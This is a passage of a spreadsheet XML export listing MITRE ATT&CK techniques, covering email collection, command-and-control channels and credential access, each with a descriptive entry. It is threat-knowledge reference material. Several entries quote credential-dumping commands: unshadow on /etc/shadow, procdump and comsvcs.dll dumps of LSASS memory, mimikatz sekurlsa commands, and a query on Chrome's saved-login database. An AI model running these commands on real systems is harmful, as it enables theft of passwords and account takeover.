Any user or administrator within the organization (or adversary with valid credentials) can create rules to automatically forward all received messages to another recipient, forward emails to different locations based on the sender, and more. Adversaries may also hide the rule by making use of the Microsoft Messaging API (MAPI) to modify the rule properties, making it hidden and not visible from Outlook, OWA or most Exchange Administration tools.(Citation: Pfammatter - Hidden Inbox Rules)
In some environments, administrators may be able to enable email forwarding rules that operate organization-wide rather than on individual inboxes. For example, Microsoft Exchange supports transport rules that evaluate all mail an organization receives against user-specified conditions, then performs a user-specified action on mail that adheres to those conditions.(Citation: Microsoft Mail Flow Rules 2023) Adversaries that abuse such features may be able to enable forwarding on all or specific mail an organization receives. </t>
  </si>
  <si>
    <t>T1114.001</t>
  </si>
  <si>
    <t>Email Collection: Local Email Collection</t>
  </si>
  <si>
    <t>Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user’s local system, such as Outlook storage or cache files.
Outlook stores data locally in offline data files with an extension of .ost. Outlook 2010 and later supports .ost file sizes up to 50GB, while earlier versions of Outlook support up to 20GB.(Citation: Outlook File Sizes) IMAP accounts in Outlook 2013 (and earlier) and POP accounts use Outlook Data Files (.pst) as opposed to .ost, whereas IMAP accounts in Outlook 2016 (and later) use .ost files. Both types of Outlook data files are typically stored in `C:\Users\&lt;username&gt;\Documents\Outlook Files` or `C:\Users\&lt;username&gt;\AppData\Local\Microsoft\Outlook`.(Citation: Microsoft Outlook Files)</t>
  </si>
  <si>
    <t>T1071.004</t>
  </si>
  <si>
    <t>Application Layer Protocol: DNS</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may communicate using the Domain Name System (DNS) application layer protocol to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. 
The DNS protocol serves an administrative function in computer networking and thus may be very common in environments. DNS traffic may also be allowed even before network authentication is completed. DNS packets contain many fields and headers in which data can be concealed. Often known as DNS tunneling, adversaries may abuse DNS to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.(Citation: PAN DNS Tunneling)(Citation: Medium DnsTunneling) </t>
  </si>
  <si>
    <t>T1071.002</t>
  </si>
  <si>
    <t>Application Layer Protocol: File Transfer Protocols</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may communicate using application layer protocols associated with transferring files to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. 
Protocols such as SMB, FTP, FTPS, and TFTP that transfer files may be very common in environments.  Packets produced from these protocols may have many fields and headers in which data can be concealed. Data could also be concealed within the transferred files. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. </t>
  </si>
  <si>
    <t>T1071.003</t>
  </si>
  <si>
    <t>Application Layer Protocol: Mail Protocols</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may communicate using application layer protocols associated with electronic mail delivery to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. 
Protocols such as SMTP/S, POP3/S, and IMAP that carry electronic mail may be very common in environments.  Packets produced from these protocols may have many fields and headers in which data can be concealed. Data could also be concealed within the email messages themselves. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. </t>
  </si>
  <si>
    <t>T1071.001</t>
  </si>
  <si>
    <t>Application Layer Protocol: Web Protocols</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. 
Protocols such as HTTP/S(Citation: CrowdStrike Putter Panda) and WebSocket(Citation: Brazking-Websockets) that carry web traffic may be very common in environments. HTTP/S packets have many fields and headers in which data can be concealed. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. </t>
  </si>
  <si>
    <t>T1132.002</t>
  </si>
  <si>
    <t>Data Encoding: Non-Standard Encoding</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may encode data with a non-standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a non-standard data encoding system that diverges from existing protocol specifications. Non-standard data encoding schemes may be based on or related to standard data encoding schemes, such as a modified Base64 encoding for the message body of an HTTP request.(Citation: Wikipedia Binary-to-text Encoding) (Citation: Wikipedia Character Encoding) </t>
  </si>
  <si>
    <t>T1132.001</t>
  </si>
  <si>
    <t>Data Encoding: Standard Encoding</t>
  </si>
  <si>
    <t>Adversaries may encode data with a standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system that adheres to existing protocol specifications. Common data encoding schemes include ASCII, Unicode, hexadecimal, Base64, and MIME.(Citation: Wikipedia Binary-to-text Encoding)(Citation: Wikipedia Character Encoding) Some data encoding systems may also result in data compression, such as gzip.</t>
  </si>
  <si>
    <t>T1001.001</t>
  </si>
  <si>
    <t>Data Obfuscation: Junk Data</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may add junk data to protocols used for command and control to make detection more difficult. By adding random or meaningless data to the protocols used for command and control, adversaries can prevent trivial methods for decoding, deciphering, or otherwise analyzing the traffic. Examples may include appending/prepending data with junk characters or writing junk characters between significant characters. </t>
  </si>
  <si>
    <t>T1001.003</t>
  </si>
  <si>
    <t>Data Obfuscation: Protocol Impersonation</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may impersonate legitimate protocols or web service traffic to disguise command and control activity and thwart analysis efforts. By impersonating legitimate protocols or web services, adversaries can make their command and control traffic blend in with legitimate network traffic.  
Adversaries may impersonate a fake SSL/TLS handshake to make it look like subsequent traffic is SSL/TLS encrypted, potentially interfering with some security tooling, or to make the traffic look like it is related with a trusted entity. </t>
  </si>
  <si>
    <t>T1568.003</t>
  </si>
  <si>
    <t>Dynamic Resolution: DNS Calculation</t>
  </si>
  <si>
    <t>Adversaries may perform calculations on addresses returned in DNS results to determine which port and IP address to use for command and control, rather than relying on a predetermined port number or the actual returned IP address. A IP and/or port number calculation can be used to bypass egress filtering on a C2 channel.(Citation: Meyers Numbered Panda)
One implementation of [DNS Calculation](https://attack.mitre.org/techniques/T1568/003) is to take the first three octets of an IP address in a DNS response and use those values to calculate the port for command and control traffic.(Citation: Meyers Numbered Panda)(Citation: Moran 2014)(Citation: Rapid7G20Espionage)</t>
  </si>
  <si>
    <t>T1568.002</t>
  </si>
  <si>
    <t>Dynamic Resolution: Domain Generation Algorithms</t>
  </si>
  <si>
    <t>Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation)
Adversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)</t>
  </si>
  <si>
    <t>T1568.001</t>
  </si>
  <si>
    <t>Dynamic Resolution: Fast Flux DNS</t>
  </si>
  <si>
    <t>Adversaries may use Fast Flux DNS to hide a command and control channel behind an array of rapidly changing IP addresses linked to a single domain resolution. This technique uses a fully qualified domain name, with multiple IP addresses assigned to it which are swapped with high frequency, using a combination of round robin IP addressing and short Time-To-Live (TTL) for a DNS resource record.(Citation: MehtaFastFluxPt1)(Citation: MehtaFastFluxPt2)(Citation: Fast Flux - Welivesecurity)
The simplest, "single-flux" method, involves registering and de-registering an addresses as part of the DNS A (address) record list for a single DNS name. These registrations have a five-minute average lifespan, resulting in a constant shuffle of IP address resolution.(Citation: Fast Flux - Welivesecurity)
In contrast, the "double-flux" method registers and de-registers an address as part of the DNS Name Server record list for the DNS zone, providing additional resilience for the connection. With double-flux additional hosts can act as a proxy to the C2 host, further insulating the true source of the C2 channel.</t>
  </si>
  <si>
    <t>T1573.002</t>
  </si>
  <si>
    <t>Encrypted Channel: Asymmetric Cryptography</t>
  </si>
  <si>
    <t>Adversaries may employ a known asymmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Asymmetric cryptography, also known as public key cryptography, uses a keypair per party: one public that can be freely distributed, and one private. Due to how the keys are generated, the sender encrypts data with the receiver’s public key and the receiver decrypts the data with their private key. This ensures that only the intended recipient can read the encrypted data. Common public key encryption algorithms include RSA and ElGamal.
For efficiency, many protocols (including SSL/TLS) use symmetric cryptography once a connection is established, but use asymmetric cryptography to establish or transmit a key. As such, these protocols are classified as [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002).</t>
  </si>
  <si>
    <t>T1573.001</t>
  </si>
  <si>
    <t>Encrypted Channel: Symmetric Cryptography</t>
  </si>
  <si>
    <t>Adversaries may employ a known symmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Symmetric encryption algorithms use the same key for plaintext encryption and ciphertext decryption. Common symmetric encryption algorithms include AES, DES, 3DES, Blowfish, and RC4.</t>
  </si>
  <si>
    <t>T1090.002</t>
  </si>
  <si>
    <t>Proxy: External Proxy</t>
  </si>
  <si>
    <t>Adversaries may use an external proxy to act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths to avoid suspicion.
External connection proxies are used to mask the destination of C2 traffic and are typically implemented with port redirectors. Compromised systems outside of the victim environment may be used for these purposes, as well as purchased infrastructure such as cloud-based resources or virtual private servers. Proxies may be chosen based on the low likelihood that a connection to them from a compromised system would be investigated. Victim systems would communicate directly with the external proxy on the Internet and then the proxy would forward communications to the C2 server.</t>
  </si>
  <si>
    <t>T1090.003</t>
  </si>
  <si>
    <t>Proxy: Multi-hop Proxy</t>
  </si>
  <si>
    <t>To disguise the source of malicious traffic, adversaries may chain together multiple proxies. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source. A particular variant of this behavior is to use onion routing networks, such as the publicly available TOR network. (Citation: Onion Routing)
In the case of network infrastructure, particularly routers, it is possible for an adversary to leverage multiple compromised devices to create a multi-hop proxy chain within the Wide-Area Network (WAN) of the enterprise.  By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001), adversaries can add custom code to the affected network devices that will implement onion routing between those nodes.  This custom onion routing network will transport the encrypted C2 traffic through the compromised population, allowing adversaries to communicate with any device within the onion routing network.  This method is dependent upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599) method in order to allow the adversaries to cross the protected network boundary of the Internet perimeter and into the organization’s WAN. Protocols such as ICMP may be used as a transport.</t>
  </si>
  <si>
    <t>T1102.002</t>
  </si>
  <si>
    <t>Web Service: Bidirectional Communication</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may use an existing, legitimate external Web service as a means for sending commands to and receiving output from a compromised system over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems can then send the output from those commands back over that Web service channel. The return traffic may occur in a variety of ways, depending on the Web service being utilized. For example, the return traffic may take the form of the compromised system posting a comment on a forum, issuing a pull request to development project, updating a document hosted on a Web service, or by sending a Tweet. 
Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection. </t>
  </si>
  <si>
    <t>T1102.001</t>
  </si>
  <si>
    <t>Web Service: Dead Drop Resolver</t>
  </si>
  <si>
    <t>Adversaries may use an existing, legitimate external Web service to host information that points to additional command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers.
Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Use of a dead drop resolver may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).</t>
  </si>
  <si>
    <t>T1102.003</t>
  </si>
  <si>
    <t>Web Service: One-Way Communication</t>
  </si>
  <si>
    <t>Adversaries may use an existing, legitimate external Web service as a means for sending commands to a compromised system without receiving return output over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems may opt to send the output from those commands back over a different C2 channel, including to another distinct Web service. Alternatively, compromised systems may return no output at all in cases where adversaries want to send instructions to systems and do not want a response.
Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.</t>
  </si>
  <si>
    <t>T1555.006</t>
  </si>
  <si>
    <t>Credentials from Password Stores: Cloud Secrets Management Stores</t>
  </si>
  <si>
    <t>Adversaries may acquire credentials from cloud-native secret management solutions such as AWS Secrets Manager, GCP Secret Manager, Azure Key Vault, and Terraform Vault.  
Secrets managers support the secure centralized management of passwords, API keys, and other credential material. Where secrets managers are in use, cloud services can dynamically acquire credentials via API requests rather than accessing secrets insecurely stored in plain text files or environment variables.  
If an adversary is able to gain sufficient privileges in a cloud environment – for example, by obtaining the credentials of high-privileged [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004) or compromising a service that has permission to retrieve secrets – they may be able to request secrets from the secrets manager. This can be accomplished via commands such as `get-secret-value` in AWS, `gcloud secrets describe` in GCP, and `az key vault secret show` in Azure.(Citation: Permiso Scattered Spider 2023)(Citation: Sysdig ScarletEel 2.0 2023)(Citation: AWS Secrets Manager)(Citation: Google Cloud Secrets)(Citation: Microsoft Azure Key Vault)
**Note:** this technique is distinct from [Cloud Instance Metadata API](https://attack.mitre.org/techniques/T1552/005) in that the credentials are being directly requested from the cloud secrets manager, rather than through the medium of the instance metadata API.</t>
  </si>
  <si>
    <t>T1555.003</t>
  </si>
  <si>
    <t>Credentials from Password Stores: Credentials from Web Browsers</t>
  </si>
  <si>
    <t>Adversaries may acquire credentials from web browsers by reading files specific to the target browser.(Citation: Talos Olympic Destroyer 2018) Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store; however, methods exist to extract plaintext credentials from web browsers.
For example, on Windows systems, encrypted credentials may be obtained from Google Chrome by reading a database file, &lt;code&gt;AppData\Local\Google\Chrome\User Data\Default\Login Data&lt;/code&gt; and executing a SQL query: &lt;code&gt;SELECT action_url, username_value, password_value FROM logins;&lt;/code&gt;. The plaintext password can then be obtained by passing the encrypted credentials to the Windows API function &lt;code&gt;CryptUnprotectData&lt;/code&gt;, which uses the victim’s cached logon credentials as the decryption key.(Citation: Microsoft CryptUnprotectData April 2018)
Adversaries have executed similar procedures for common web browsers such as FireFox, Safari, Edge, etc.(Citation: Proofpoint Vega Credential Stealer May 2018)(Citation: FireEye HawkEye Malware July 2017) Windows stores Internet Explorer and Microsoft Edge credentials in Credential Lockers managed by the [Windows Credential Manager](https://attack.mitre.org/techniques/T1555/004).
Adversaries may also acquire credentials by searching web browser process memory for patterns that commonly match credentials.(Citation: GitHub Mimikittenz July 2016)
After acquiring credentials from web browsers, adversaries may attempt to recycle the credentials across different systems and/or accounts in order to expand access. This can result in significantly furthering an adversary's objective in cases where credentials gained from web browsers overlap with privileged accounts (e.g. domain administrator).</t>
  </si>
  <si>
    <t>T1555.005</t>
  </si>
  <si>
    <t>Credentials from Password Stores: Password Managers</t>
  </si>
  <si>
    <t>Adversaries may acquire user credentials from third-party password managers.(Citation: ise Password Manager February 2019) Password managers are applications designed to store user credentials, normally in an encrypted database. Credentials are typically accessible after a user provides a master password that unlocks the database. After the database is unlocked, these credentials may be copied to memory. These databases can be stored as files on disk.(Citation: ise Password Manager February 2019)
Adversaries may acquire user credentials from password managers by extracting the master password and/or plain-text credentials from memory.(Citation: FoxIT Wocao December 2019)(Citation: Github KeeThief) Adversaries may extract credentials from memory via [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212).(Citation: NVD CVE-2019-3610)
 Adversaries may also try brute forcing via [Password Guessing](https://attack.mitre.org/techniques/T1110/001) to obtain the master password of a password manager.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>T1555.002</t>
  </si>
  <si>
    <t>Credentials from Password Stores: Securityd Memory</t>
  </si>
  <si>
    <t>An adversary may obtain root access (allowing them to read securityd’s memory), then they can scan through memory to find the correct sequence of keys in relatively few tries to decrypt the user’s logon keychain. This provides the adversary with all the plaintext passwords for users, WiFi, mail, browsers, certificates, secure notes, etc.(Citation: OS X Keychain)(Citation: OSX Keydnap malware)
In OS X prior to El Capitan, users with root access can read plaintext keychain passwords of logged-in users because Apple’s keychain implementation allows these credentials to be cached so that users are not repeatedly prompted for passwords.(Citation: OS X Keychain)(Citation: External to DA, the OS X Way) Apple’s securityd utility takes the user’s logon password, encrypts it with PBKDF2, and stores this master key in memory. Apple also uses a set of keys and algorithms to encrypt the user’s password, but once the master key is found, an adversary need only iterate over the other values to unlock the final password.(Citation: OS X Keychain)</t>
  </si>
  <si>
    <t>T1555.004</t>
  </si>
  <si>
    <t>Credentials from Password Stores: Windows Credential Manager</t>
  </si>
  <si>
    <t>Adversaries may acquire credentials from the Windows Credential Manager. The Credential Manager stores credentials for signing into websites, applications, and/or devices that request authentication through NTLM or Kerberos in Credential Lockers (previously known as Windows Vaults).(Citation: Microsoft Credential Manager store)(Citation: Microsoft Credential Locker)
The Windows Credential Manager separates website credentials from application or network credentials in two lockers. As part of [Credentials from Web Browsers](https://attack.mitre.org/techniques/T1555/003), Internet Explorer and Microsoft Edge website credentials are managed by the Credential Manager and are stored in the Web Credentials locker. Application and network credentials are stored in the Windows Credentials locker.
Credential Lockers store credentials in encrypted `.vcrd` files, located under `%Systemdrive%\Users\\[Username]\AppData\Local\Microsoft\\[Vault/Credentials]\`. The encryption key can be found in a file named &lt;code&gt;Policy.vpol&lt;/code&gt;, typically located in the same folder as the credentials.(Citation: passcape Windows Vault)(Citation: Malwarebytes The Windows Vault)
Adversaries may list credentials managed by the Windows Credential Manager through several mechanisms. &lt;code&gt;vaultcmd.exe&lt;/code&gt; is a native Windows executable that can be used to enumerate credentials stored in the Credential Locker through a command-line interface. Adversaries may also gather credentials by directly reading files located inside of the Credential Lockers. Windows APIs, such as &lt;code&gt;CredEnumerateA&lt;/code&gt;, may also be absued to list credentials managed by the Credential Manager.(Citation: Microsoft CredEnumerate)(Citation: Delpy Mimikatz Crendential Manager)
Adversaries may also obtain credentials from credential backups. Credential backups and restorations may be performed by running &lt;code&gt;rundll32.exe keymgr.dll KRShowKeyMgr&lt;/code&gt; then selecting the “Back up...” button on the “Stored User Names and Passwords” GUI.
Password recovery tools may also obtain plain text passwords from the Credential Manager.(Citation: Malwarebytes The Windows Vault)</t>
  </si>
  <si>
    <t>T1606.002</t>
  </si>
  <si>
    <t>Forge Web Credentials: SAML Tokens</t>
  </si>
  <si>
    <t>An adversary may forge SAML tokens with any permissions claims and lifetimes if they possess a valid SAML token-signing certificate.(Citation: Microsoft SolarWinds Steps) The default lifetime of a SAML token is one hour, but the validity period can be specified in the &lt;code&gt;NotOnOrAfter&lt;/code&gt; value of the &lt;code&gt;conditions ...&lt;/code&gt; element in a token. This value can be changed using the &lt;code&gt;AccessTokenLifetime&lt;/code&gt; in a &lt;code&gt;LifetimeTokenPolicy&lt;/code&gt;.(Citation: Microsoft SAML Token Lifetimes) Forged SAML tokens enable adversaries to authenticate across services that use SAML 2.0 as an SSO (single sign-on) mechanism.(Citation: Cyberark Golden SAML)
An adversary may utilize [Private Keys](https://attack.mitre.org/techniques/T1552/004) to compromise an organization's token-signing certificate to create forged SAML tokens. If the adversary has sufficient permissions to establish a new federation trust with their own Active Directory Federation Services (AD FS) server, they may instead generate their own trusted token-signing certificate.(Citation: Microsoft SolarWinds Customer Guidance) This differs from [Steal Application Access Token](https://attack.mitre.org/techniques/T1528) and other similar behaviors in that the tokens are new and forged by the adversary, rather than stolen or intercepted from legitimate users.
An adversary may gain administrative Azure AD privileges if a SAML token is forged which claims to represent a highly privileged account. This may lead to [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Microsoft SolarWinds Customer Guidance)</t>
  </si>
  <si>
    <t>T1003.008</t>
  </si>
  <si>
    <t>OS Credential Dumping: /etc/passwd and /etc/shadow</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may attempt to dump the contents of &lt;code&gt;/etc/passwd&lt;/code&gt; and &lt;code&gt;/etc/shadow&lt;/code&gt; to enable offline password cracking. Most modern Linux operating systems use a combination of &lt;code&gt;/etc/passwd&lt;/code&gt; and &lt;code&gt;/etc/shadow&lt;/code&gt; to store user account information including password hashes in &lt;code&gt;/etc/shadow&lt;/code&gt;. By default, &lt;code&gt;/etc/shadow&lt;/code&gt; is only readable by the root user.(Citation: Linux Password and Shadow File Formats)
The Linux utility, unshadow, can be used to combine the two files in a format suited for password cracking utilities such as John the Ripper:(Citation: nixCraft - John the Ripper) &lt;code&gt;# /usr/bin/unshadow /etc/passwd /etc/shadow &gt; /tmp/crack.password.db&lt;/code&gt;
</t>
  </si>
  <si>
    <t>T1003.005</t>
  </si>
  <si>
    <t>OS Credential Dumping: Cached Domain Credentials</t>
  </si>
  <si>
    <t>Adversaries may attempt to access cached domain credentials used to allow authentication to occur in the event a domain controller is unavailable.(Citation: Microsoft - Cached Creds)
On Windows Vista and newer, the hash format is DCC2 (Domain Cached Credentials version 2) hash, also known as MS-Cache v2 hash.(Citation: PassLib mscache) The number of default cached credentials varies and can be altered per system. This hash does not allow pass-the-hash style attacks, and instead requires [Password Cracking](https://attack.mitre.org/techniques/T1110/002) to recover the plaintext password.(Citation: ired mscache)
With SYSTEM access, the tools/utilities such as [Mimikatz](https://attack.mitre.org/software/S0002), [Reg](https://attack.mitre.org/software/S0075), and secretsdump.py can be used to extract the cached credentials.
Note: Cached credentials for Windows Vista are derived using PBKDF2.(Citation: PassLib mscache)</t>
  </si>
  <si>
    <t>T1003.006</t>
  </si>
  <si>
    <t>OS Credential Dumping: DCSync</t>
  </si>
  <si>
    <t>Adversaries may attempt to access credentials and other sensitive information by abusing a Windows Domain Controller's application programming interface (API)(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller using a technique called DCSync.
Members of the Administrators, Domain Admins, and Enterprise Admin groups or computer accounts on the domain controller are able to run DCSync to pull password data(Citation: ADSecurity Mimikatz DCSync) from Active Directory, which may include current and historical hashes of potentially useful accounts such as KRBTGT and Administrators. The hashes can then in turn be used to create a [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) for use in [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003)(Citation: Harmj0y Mimikatz and DCSync) or change an account's password as noted in [Account Manipulation](https://attack.mitre.org/techniques/T1098).(Citation: InsiderThreat ChangeNTLM July 2017)
DCSync functionality has been included in the "lsadump" module in [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: GitHub Mimikatz lsadump Module) Lsadump also includes NetSync, which performs DCSync over a legacy replication protocol.(Citation: Microsoft NRPC Dec 2017)</t>
  </si>
  <si>
    <t>T1003.004</t>
  </si>
  <si>
    <t>OS Credential Dumping: LSA Secrets</t>
  </si>
  <si>
    <t>Adversaries with SYSTEM access to a host may attempt to access Local Security Authority (LSA) secrets, which can contain a variety of different credential materials, such as credentials for service accounts.(Citation: Passcape LSA Secrets)(Citation: Microsoft AD Admin Tier Model)(Citation: Tilbury Windows Credentials) LSA secrets are stored in the registry at &lt;code&gt;HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets&lt;/code&gt;. LSA secrets can also be dumped from memory.(Citation: ired Dumping LSA Secrets)
[Reg](https://attack.mitre.org/software/S0075) can be used to extract from the Registry. [Mimikatz](https://attack.mitre.org/software/S0002) can be used to extract secrets from memory.(Citation: ired Dumping LSA Secrets)</t>
  </si>
  <si>
    <t>T1003.001</t>
  </si>
  <si>
    <t>OS Credential Dumping: LSASS Memory</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550).
As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system.
For example, on the target host use procdump:
* &lt;code&gt;procdump -ma lsass.exe lsass_dump&lt;/code&gt;
Locally, mimikatz can be run using:
* &lt;code&gt;sekurlsa::Minidump lsassdump.dmp&lt;/code&gt;
* &lt;code&gt;sekurlsa::logonPasswords&lt;/code&gt;
Built-in Windows tools such as comsvcs.dll can also be used:
* &lt;code&gt;rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump PID  lsass.dmp full&lt;/code&gt;(Citation: Volexity Exchange Marauder March 2021)(Citation: Symantec Attacks Against Government Sector)
Windows Security Support Provider (SSP) DLLs are loaded into LSASS process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages&lt;/code&gt; and &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages&lt;/code&gt;. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014)
The following SSPs can be used to access credentials:
* Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package.
* Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges.(Citation: TechNet Blogs Credential Protection)
* Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later.
* CredSSP:  Provides SSO and Network Level Authentication for Remote Desktop Services.(Citation: TechNet Blogs Credential Protection)
</t>
  </si>
  <si>
    <t>T1003.003</t>
  </si>
  <si>
    <t>OS Credential Dumping: NTDS</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights. By default, the NTDS file (NTDS.dit) is located in &lt;code&gt;%SystemRoot%\NTDS\Ntds.dit&lt;/code&gt; of a domain controller.(Citation: Wikipedia Active Directory)
In addition to looking for NTDS files on active Domain Controllers, adversaries may search for backups that contain the same or similar information.(Citation: Metcalf 2015)
The following tools and techniques can be used to enumerate the NTDS file and the contents of the entire Active Directory hashes.
* Volume Shadow Copy
* secretsdump.py
* Using the in-built Windows tool, ntdsutil.exe
* Invoke-NinjaCopy
</t>
  </si>
  <si>
    <t>T1003.007</t>
  </si>
  <si>
    <t>OS Credential Dumping: Proc Filesystem</t>
  </si>
  <si>
    <t>Adversaries may gather credentials from the proc filesystem or `/proc`. The proc filesystem is a pseudo-filesystem used as an interface to kernel data structures for Linux based systems managing virtual memory. For each process, the `/proc/&lt;PID&gt;/maps` file shows how memory is mapped within the process’s virtual address space. And `/proc/&lt;PID&gt;/mem`, exposed for debugging purposes, provides access to the process’s virtual address space.(Citation: Picus Labs Proc cump 2022)(Citation: baeldung Linux proc map 2022)
When executing with root privileges, adversaries can search these memory locations for all processes on a system that contain patterns that are indicative of credentials, such as looking for fixed strings in memory structures or cached hashes. When running without privileged access, processes can still view their own virtual memory locations. Some services or programs may save credentials in clear text inside the process’s memory.(Citation: MimiPenguin GitHub May 2017)(Citation: Polop Linux PrivEsc Gitbook)
If running as or with the permissions of a web browser, a process can search the `/maps` &amp; `/mem` locations for common website credential patterns (that can also be used to find adjacent memory within the same structure) in which hashes or cleartext credentials may be located.</t>
  </si>
  <si>
    <t>T1003.002</t>
  </si>
  <si>
    <t>OS Credential Dumping: Security Account Manager</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through in-memory techniques or through the Windows Registry where the SAM database is stored. The SAM is a database file that contains local accounts for the host, typically those found with the &lt;code&gt;net user&lt;/code&gt; command. Enumerating the SAM database requires SYSTEM level access.
A number of tools can be used to retrieve the SAM file through in-memory techniques:
* pwdumpx.exe
* [gsecdump](https://attack.mitre.org/software/S0008)
* [Mimikatz](https://attack.mitre.org/software/S0002)
* secretsdump.py
